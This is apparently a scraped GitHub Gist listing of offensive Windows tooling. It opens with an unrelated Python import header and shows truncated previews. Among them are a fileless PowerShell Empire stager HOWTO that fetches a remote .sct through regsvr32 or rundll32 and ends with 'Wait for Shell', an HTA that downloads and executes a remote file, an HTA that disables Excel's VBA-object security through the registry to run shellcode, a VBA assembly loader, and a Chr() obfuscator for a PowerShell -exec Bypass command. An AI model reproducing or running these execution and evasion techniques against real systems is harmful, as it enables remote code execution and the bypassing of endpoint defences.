# coding=utf-8
import datetime
import sys
import time
import threading
import traceback
import SocketServer
from dnslib import *
@khr0x40sh
khr0x40sh / HOWTO
Created April 19, 2016 14:32
Fileless Empire Stager
1. Create Empire Listener
2. Generate Stager
3. Host Stager Code At Some URL
4. Host .sct File At Some URL
5. On host, execute regsvr32.exe /i:http://server/empire.sct scrobj.dll
6. Instantiate the Object. ( ex: $s=New-Object -COM "Empire";$s.Exec() )
-Or This rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();s=new%20ActiveXObject("Empire");s.Exec();
7. Wait for Shell...
@khr0x40sh
khr0x40sh / empire.cs
Created April 19, 2016 14:32
PowerShell Empire via InstallUtil.exe
using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//Add For PowerShell Invocation
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
@khr0x40sh
khr0x40sh / InstallUtil.hta
Created April 19, 2016 14:34
Download And Compile
<html>
<head>
<script>
//Set your settings
var strFileURL = "http://192.168.56.103/execalc.html";
var oTest = new ActiveXObject("wscript.shell");
var pathTest = oTest.ExpandEnvironmentStrings("%USERPROFILE%") + "\\Downloads\\execalc.html";
var strHDLocation = pathTest;
@khr0x40sh
khr0x40sh / CalcExcel.hta
Created April 19, 2016 14:35
Shellcode Execution Via HTA
<html>
<head>
<script>
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
@khr0x40sh
khr0x40sh / elgamal.ps1
Created April 19, 2016 14:36
ElGamal Encryption in PowerShell
<#
ElGamal in PowerShell
by Casey Smith @subTee
The key generator works as follows:
Alice generates an efficient description of a cyclic group G of order q ,with generator g.
Alice chooses an x randomly from 1 - (q-1)
Alice computes h = g^x.
@khr0x40sh
khr0x40sh / mscorlib_load_assembly.vba
Created October 1, 2019 13:28 — forked from monoxgas/mscorlib_load_assembly.vba
VBA code for calling Assembly.Load using raw vtable lookups for the IUnknown
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb
Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr
#If Win64 Then
Const LS As LongPtr = 8&
#Else
Const LS As LongPtr = 4&
@khr0x40sh
khr0x40sh / Print-HexDump.ps1
Last active November 5, 2019 15:05
hexdump output in powershell
Param($byteArray);
function print_prettystring($value)
{
$final = ""
for($i=0; $i -lt $value.Count; $i++)
{
if($value[$i] -gt 31 -and $value[$i] -lt 127)
{
$final += [char]$value[$i]
@khr0x40sh
khr0x40sh / SUNBURST-GUID-creator.ps1
Created January 13, 2021 16:47
Generates the SUNBURST GUID and an example DGA prefix as would be seen on a compromised SolarWinds system
function Invoke-Sunburst-GUID-creator
{
<#
.Synopsis
SUNBURST GUID CREATOR
.Description
The script will generate the SUNBURST GUID and an example DGA prefix as would be seen on a compromised SolarWinds server.
The SUNBURST GUID is made up of the machine's primary non local loopback network adapter's MAC address,
the domain name of the system, and the (optional) GUID of the system in the registry.
@khr0x40sh
khr0x40sh / Get-VBACHRObfuscatedString.ps1
Created November 19, 2019 15:36
Takes a string and applies CHR(ascii int) & for each character in string
Param([string]$string = "C:\windows\syswow64\windowspowershell\v1.0\powershell.exe -exec Bypass -nop ping 127.0.0.1"
);
$result = ""
$strA = $string.ToCharArray()
for($i = 0; $i -lt $strA.Length; $i++)
{
$x = [byte]$strA[$i]
$result += "Chr (" + $x.ToString() + ") & "
}